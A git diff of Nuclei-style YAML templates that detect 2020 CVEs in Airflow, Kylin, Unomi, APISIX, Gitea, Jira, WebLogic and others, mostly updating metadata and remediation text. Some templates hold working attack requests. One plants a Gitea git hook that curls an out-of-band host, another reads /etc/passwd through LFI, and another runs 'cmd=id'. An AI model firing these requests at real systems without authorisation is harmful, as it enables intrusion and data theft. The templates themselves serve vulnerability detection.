4b0a00483046022100b5814f2b34f6c9b2d1eac0ba1c85bf437f0fa0e3e16169e9369174ecfb7213fb022100a0fc859137ee33f1b085813145dff2594d7f15eef30fbef64499909f22ca7d0f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 44cf0e4670..0bf04c049b 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -6,22 +6,27 @@ info: severity: critical description: | Airflow's Experimental API prior 1.10.11 allows all API requests without authentication. + remediation: | + From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. reference: - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 - remediation: | - From Airflow 1.10.11 forward, the default has been changed to deny all requests by default. Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references. + - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 + cwe-id: CWE-1188 + epss-score: 0.96763 + epss-percentile: 0.99551 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - epss-score: 0.95492 metadata: - max-request: 1 verified: true + max-request: 1 + vendor: apache + product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev @@ -39,4 +44,4 @@ http: - '"items":' condition: and -# Enhanced by mp on 2022/05/16 +# digest: 490a00463044022026e5922c71575b379200b9b10b739df96f899d1e925eb51e500684e2aa58aeca0220781f76adf8554a1f669721b57df1f10b7a72196bd66804b31ccb41e2fc500e27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 6266e82bb3..8364541afa 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication. + remediation: | + Secure the configuration file by restricting access permissions and implementing proper access controls. reference: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html @@ -14,35 +16,39 @@ info: cvss-score: 5.3 cve-id: CVE-2020-13937 cwe-id: CWE-922 - cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - epss-score: 0.97436 - tags: cve,cve2020,apache + epss-score: 0.97368 + epss-percentile: 0.99868 + cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: kylin + tags: cve,cve2020,apache http: - method: GET path: - "{{BaseURL}}/kylin/api/admin/config" + headers: - Content-Type: application/json + Content-Type: "application/json" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: header words: - "application/json" - part: header - type: word + part: body words: - config - kylin.metadata.url condition: and - part: body -# Enhanced by cs on 2022/02/28 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100854955d17b0fc009ea24a0025932599fce83ec9e55aeca7a62a74b92c5a4047102205444e1e4f6ea19554583d833c022ce1051391a93556f8df25e5e1493a8bf3f88:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 1c4329f532..ed538837b0 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -9,35 +9,39 @@ info: offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process. This vulnerability affects all versions of Apache Unomi prior to 1.5.2. + remediation: Apache Unomi users should upgrade to 1.5.2 or later. reference: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 - https://nvd.nist.gov/vuln/detail/CVE-2020-13942 - http://unomi.apache.org./security/cve-2020-13942.txt - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E - remediation: Apache Unomi users should upgrade to 1.5.2 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13942 - cwe-id: CWE-74 + cwe-id: CWE-74,CWE-20 + epss-score: 0.97521 + epss-percentile: 0.99985 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* - epss-score: 0.9752 - tags: cve,cve2020,apache,rce metadata: max-request: 1 + vendor: apache + product: unomi + tags: cve,cve2020,apache,rce +variables: + id: "{{to_lower(rand_text_alpha(5))}}" http: - method: POST path: - "{{BaseURL}}/context.json" - headers: - Content-Type: application/json + body: | { "filters": [ { - "id": "nuclei", + "id": "{{id}}", "filters": [ { "condition": { @@ -53,15 +57,11 @@ http: "sessionId": "nuclei" } + headers: + Content-Type: "application/json" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "(profile|session)(Id|Properties|Segments)" - - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" - condition: and - - type: word part: header words: @@ -69,7 +69,15 @@ http: - "context-profile-id" condition: and + - type: regex + part: body + regex: + - "(profile|session)(Id|Properties|Segments)" + - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" + condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/05/16 + +# digest: 4b0a00483046022100c8b7628377418c61e07f14931ae1f24e83311edae796cd5d877ba762b1826dc90221008b2bbf9695c566eff8680e2e7fa2f6e45de91637854d3ae37c9d382f31ff4f31:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 746817c491..fc15902a49 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. + remediation: | + Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E @@ -15,11 +17,14 @@ info: cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 + epss-score: 0.00675 + epss-percentile: 0.77598 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* - epss-score: 0.00598 - tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix metadata: max-request: 2 + vendor: apache + product: apisix + tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix http: - raw: @@ -39,7 +44,6 @@ http: } } } - - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} @@ -62,4 +66,4 @@ http: regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# Enhanced by mp on 2022/10/06 +# digest: 490a0046304402206b0befc777110e62b3893b3cc2bef9cab791f7c78dced94d3ca733cc9983fc9002205c09eed038e05ef95e052cd616df4cac0e88d5adb4b81ce467a55a8e4b092f7c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 9ed603d0e9..4bb803149d 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -5,20 +5,28 @@ info: author: princechaddha severity: critical description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format. + remediation: | + Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/10287 - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro - https://nvd.nist.gov/vuln/detail/CVE-2020-14092 + - https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers + - https://wpvulndb.com/vulnerabilities/10287 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14092 cwe-id: CWE-89 - cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:*:*:* - epss-score: 0.8613 - tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress + epss-score: 0.8059 + epss-percentile: 0.97963 + cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: ithemes + product: paypal_pro + framework: wordpress + tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress http: - method: GET @@ -28,20 +36,21 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "text/html" - part: header + - type: word + part: body words: - '"user_login"' - '"user_email"' - '"user_pass"' - '"user_activation_key"' condition: and - part: body - type: status status: - 200 -# Enhanced by mp on 2022/05/05 +# digest: 490a0046304402206fea3d5a926a8feab22d0d5e75bf389011bcac6aa7664a8a451e3e4e64c5060b0220676704d4923f61ebf54e4b484dc8064a0a6a5e3e6ca8196a5e620bb0548f56db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index b8cbad88f6..ddc10c9c94 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -6,60 +6,58 @@ info: severity: high description: | Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides." + remediation: Fixed in version 1.16.7. reference: - https://dl.gitea.io/gitea/1.16.6 - https://github.com/go-gitea/gitea/pull/13058 - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ - https://nvd.nist.gov/vuln/detail/CVE-2020-14144 - remediation: Fixed in version 1.16.7. + - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 + epss-score: 0.97121 + epss-percentile: 0.9971 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* - epss-score: 0.96681 metadata: - max-request: 7 - shodan-query: html:"Powered by Gitea Version" verified: true - tags: cve,cve2020,rce,gitea,authenticated,git + max-request: 7 + vendor: gitea + product: gitea + shodan-query: html:"Powered by Gitea Version" + tags: cve,cve2020,rce,gitea,authenticated,git,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master - - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} @@ -68,12 +66,13 @@ http: _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - http - type: word part: body_1 @@ -85,21 +84,21 @@ http: name: csrf group: 1 regex: - - 'name="_csrf" value="(.*)"' + - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - - 'name="_csrf" content="(.*)"' + - name="_csrf" content="(.*)" internal: true - type: regex name: last_commit group: 1 regex: - - 'name="last_commit" value="(.*)"' + - name="last_commit" value="(.*)" internal: true -# Enhanced by md on 2023/03/28 +# digest: 490a0046304402200c4113c6bd9b9a18058030ca8aa6bd2cefc616d8ba5d046bc3054b698522bcf5022058c0237791bff4531b773b71176f68d7816c95d818e983771cd42b8c90c277b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 4a08f806fa..381e98bd8e 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -5,6 +5,8 @@ info: author: x1m_martijn severity: medium description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names. + remediation: | + Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-71536 - https://nvd.nist.gov/vuln/detail/CVE-2020-14179 @@ -12,9 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.00972 + epss-score: 0.0071 + epss-percentile: 0.78285 + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: atlassian + product: jira_data_center shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,atlassian,jira,exposure,disclosure @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/01 +# digest: 490a00463044022079fddfd6f5ad7057b862a1136d5444d384c9fe6625ba337a71edfd085df00bdc02201e5816639249eeef8b7175a17c90a41c38b31956bbb0528a4bb34afe065a0bf0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index c69995c6fa..0771f7c099 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -5,6 +5,8 @@ info: author: bjhulst severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. + remediation: | + Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html @@ -14,9 +16,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.97351 + epss-score: 0.96763 + epss-percentile: 0.99552 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: atlassian + product: data_center shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,atlassian,jira,packetstorm @@ -37,4 +43,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/04 +# digest: 4a0a00473045022015f4e0ef3aa84e5c5cac1d2a53084b5e44860e41200a93e5719b28974b770302022100908e2225412ced0b5986adc53cd97c3d9f6aae122f500d311396905508f8df42:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index c40d6b81dc..041cc64702 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + remediation: | + Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/agentejo/cockpit/issues/1310 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 @@ -13,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-score: 0.00113 + epss-percentile: 0.44548 + cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: agentejo + product: cockpit tags: cve,cve2020,cockpit,agentejo,xss,oss http: @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: @@ -42,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/02 +# digest: 4a0a0047304502203af28a8a8d431f9484af5622e382174fcf5672a68e9193bff26fcd6a1da3e717022100e06cb8054c17163f20593a2eb935cb21d04d3eae36972ef4a0deaf7c843adaab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 873a302e46..4b61033f0c 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. + remediation: | + Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 - https://nvd.nist.gov/vuln/detail/CVE-2020-14413 @@ -13,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-14413 cwe-id: CWE-79 - cpe: cpe:2.3:a:nedi:nedi:*:*:*:*:*:*:*:* epss-score: 0.00095 - tags: cve,cve2020,nedi,xss + epss-percentile: 0.39826 + cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nedi + product: nedi + tags: cve,cve2020,nedi,xss http: - method: GET @@ -26,19 +31,18 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100816794f24e20b8d04f96daad1c9c874ec181bc6fffd54866a691cbf88244ffda02210085d6b34ebb398d9498e1ac74d394c5725e9a9663149a835a71919fb9b65554c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 1b36865194..f342ab820a 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -6,22 +6,28 @@ info: severity: critical description: | Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://github.com/pprietosanchez/CVE-2020-14750 - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750 - https://nvd.nist.gov/vuln/detail/CVE-2020-14750 + - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - cpe: cpe:2.3:a:oracle:fusion_middleware:*:*:*:*:*:*:*:* - epss-score: 0.97539 + epss-score: 0.97545 + epss-percentile: 0.99993 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Weblogic Application Server" verified: true - tags: cve,cve2020,rce,oracle,weblogic,unauth,kev + max-request: 1 + vendor: oracle + product: fusion_middleware + shodan-query: http.html:"Weblogic Application Server" + tags: cve,cve2020,rce,oracle,weblogic,unauth,kev,packetstorm http: - raw: @@ -53,7 +59,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" @@ -67,4 +73,4 @@ http: regex: - '(.*)' -# Enhanced by mp on 2022/10/06 +# digest: 4a0a0047304502204d27c726efe360333ec9850cc8027a7668b19ca758a32b9c4c2fff34b3daa864022100d9b8481268d2794a9580da5646f315d83c2d9b39022803ffd7e7aa01920fcf0e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index a41cc339b8..4dee75ea50 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -5,6 +5,8 @@ info: author: Ivo Palazzolo (@palaziv) severity: high description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage." + remediation: | + Apply the latest security patches and updates provided by Oracle to fix this vulnerability. reference: - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - https://www.oracle.com/security-alerts/cpuoct2020.html @@ -13,26 +15,33 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-14864 - cpe: cpe:2.3:a:oracle:business_intelligence:*:*:*:*:*:*:*:* - epss-score: 0.35997 - tags: cve,cve2020,oracle,lfi,kev,packetstorm + cwe-id: CWE-22 + epss-score: 0.30484 + epss-percentile: 0.96438 + cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 + vendor: oracle + product: business_intelligence + tags: cve,cve2020,oracle,lfi,kev,packetstorm http: - method: GET path: - - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies + - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' + cookie-reuse: true + matchers-condition: and matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status status: - 200 - - type: regex - regex: - - 'root:.*:0:0:' - part: body -# Enhanced by mp on 2022/07/13 +# digest: 4a0a00473045022100eac9c00798213be9e4f1ce37a044dd8170c6c25ff3853d2ddf3e2135a7c6d67e0220041de9d1ee5a199e42d515b629a4a29de8026f9966d51c782ea5867fa918d5dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 78960c9e10..e456ec7e05 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. reference: - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - https://www.oracle.com/security-alerts/cpuoct2020.html @@ -16,11 +18,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97553 - tags: cve,cve2020,oracle,rce,weblogic,oast,kev + epss-score: 0.97454 + epss-percentile: 0.99943 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,rce,weblogic,oast,kev http: - method: GET @@ -39,5 +44,4 @@ http: words: - "http" - -# Enhanced by mp on 2022/04/27 +# digest: 4b0a00483046022100b8f323927b4775837c3a7570698a4e6ce11048dcd0a9e7187da10d74bff82bee0221008021e50b3f5542013d080415fc7871a8212e8e888e235f29157ee89836c3d538:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 5d42e36293..7d2f6d5d6e 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. + remediation: | + Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 @@ -15,14 +17,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14883 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97532 + epss-score: 0.97273 + epss-percentile: 0.998 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: oracle + product: weblogic_server shodan-query: title:"Oracle PeopleSoft Sign-in" tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020 - variables: str: "{{randstr}}" revstr: "{{reverse(str)}}" @@ -55,4 +59,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/20 +# digest: 4a0a00473045022037359dcc1815667bd5bb7558caf6940a852d7e53c79e21d5a614f233ef96da48022100912d5062781de88d1663fb61b2ee6374a8b49bf5ce99800a7c13e56df488a540:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 3f88925417..567611078c 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. + remediation: | + Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. reference: - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - https://www.supremainc.com/en/support/biostar-2-pakage.asp @@ -14,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 + epss-score: 0.24648 + epss-percentile: 0.961 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* - epss-score: 0.26151 - tags: suprema,biostar2,packetstorm,cve,cve2020,lfi metadata: max-request: 1 + vendor: supremainc + product: biostar_2 + tags: suprema,biostar2,packetstorm,cve,cve2020,lfi http: - method: GET @@ -34,4 +39,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/07/13 +# digest: 